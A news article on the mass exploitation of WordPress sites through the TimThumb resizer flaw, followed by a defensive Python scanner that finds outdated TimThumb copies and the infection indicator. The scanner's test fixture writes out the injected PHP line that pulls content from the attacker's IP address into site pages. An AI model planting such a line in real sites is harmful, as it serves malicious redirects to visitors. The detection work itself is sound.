A vulnerability in the TimThumb image resizer, a script that many WordPress themes and plugins use to fetch and resize images from sites such as Flickr and Photobucket, has been exploited by attackers to trigger a spike of malware infections across a huge number of WordPress websites. Visitors to the infected sites were redirected to malicious pages.
The full impact is hard to estimate, but analysts are doing their best to answer that question. Sucuri Security, a website integrity monitoring vendor, reported that with the help of Google search it was able to produce a rough estimate of the number of affected web pages.
The injected code adds the output of a file_get_contents() call against a remote host to the compromised site's pages. The indicator to look for is 91.196.216.30/bt.php. If display_errors is enabled in PHP, the page itself will show a warning such as: ‘Warning: file_get_contents(http://91.196.216.30/bt.php?ip=IP&host=..’.
Using that error message as a Google search term to locate infected pages, David Dede of Sucuri Security found more than 1 million results, over 200,000 of which were indexed in the last month. Dede's method keyed on one particular form of the malicious code; since the variations could be numerous, the real number of compromised web pages could be a couple of million.
Sucuri Security points out that webmasters should take immediate action to get rid of the problem: replace the timthumb.php file in WordPress themes and plugins with the latest version, which fixes the flaw. Old TimThumb copies are dangerous even when they sit inactive in unused or forgotten themes, and they should be removed as well. More generally, analysts recommend that webmasters remove all unused scripts and test accounts from their websites, since a similar vulnerability can surface at any time.
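The two checks above, inventorying every TimThumb copy (including ones in forgotten themes) and searching for the infection indicator, can be scripted. The following is an added example, not Sucuri's tool or any code from the article. It assumes that TimThumb copies are named timthumb.php or thumb.php and declare their release as define('VERSION', '...') as the 2.x releases do; copies with no such constant are reported as version None and treated as outdated, which is the safe default. The minimum safe version is a parameter the operator supplies, since the article names no version number, and the sample site it scans is a constructed fixture.

```python
"""Inventory TimThumb copies under a WordPress tree and look for the infection
indicator named in the article. Added example; not Sucuri's tool."""
import os
import re
import tempfile

# Indicator string from the article: the remote file the injected code fetches.
INDICATOR = "91.196.216.30/bt.php"

# TimThumb 2.x declares its release as define('VERSION', '2.x.y').
# Assumption: a copy without this constant is reported as version None.
VERSION_RE = re.compile(
    r"""define\s*\(\s*['"]VERSION['"]\s*,\s*['"]([0-9.]+)['"]\s*\)""")

# Assumption: themes often ship the script renamed as thumb.php.
TIMTHUMB_NAMES = ("timthumb.php", "thumb.php")


def parse_version(version):
    """'2.8.10' -> (2, 8, 10); None -> () so an unversioned copy compares as old."""
    if not version:
        return ()
    return tuple(int(part) for part in version.split(".") if part.isdigit())


def timthumb_version(source):
    """Return the VERSION constant declared in a timthumb.php source, or None."""
    match = VERSION_RE.search(source)
    return match.group(1) if match else None


def scan_wp_content(root, minimum_safe):
    """Walk `root` (typically wp-content) and return a report dict:
      'outdated': [(path, version)] TimThumb copies below minimum_safe or unversioned
      'current':  [(path, version)] copies at or above minimum_safe
      'infected': [path] any file containing the indicator string
    Inactive themes are walked too, since forgotten copies are just as exploitable.
    """
    report = {"outdated": [], "current": [], "infected": []}
    floor = parse_version(minimum_safe)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if INDICATOR in data:
                report["infected"].append(path)
            if name.lower() in TIMTHUMB_NAMES:
                version = timthumb_version(data)
                bucket = "current" if parse_version(version) >= floor else "outdated"
                report[bucket].append((path, version))
    return report


def build_sample_site():
    """Constructed fixture (not real site data): an active theme with a current
    TimThumb and an injected footer, a forgotten theme with an old copy, and a
    plugin whose copy declares no version at all."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    files = {
        "themes/active/timthumb.php": "<?php\ndefine ('VERSION', '2.8.10');\n",
        "themes/active/footer.php":
            "<?php echo file_get_contents('http://91.196.216.30/bt.php'); ?>\n",
        "themes/forgotten/scripts/timthumb.php": "<?php\ndefine ('VERSION', '1.33');\n",
        "plugins/gallery/thumb.php": "<?php\n// no VERSION constant in this copy\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    result = scan_wp_content(site, minimum_safe="2.8.10")
    for bucket in ("infected", "outdated", "current"):
        print(bucket)
        for entry in result[bucket]:
            print("  ", entry)
```

Run it against a real install as `scan_wp_content("/var/www/html/wp-content", "<latest release>")`; every path in `infected` needs cleaning and every entry in `outdated` should be replaced or deleted, including the unversioned ones.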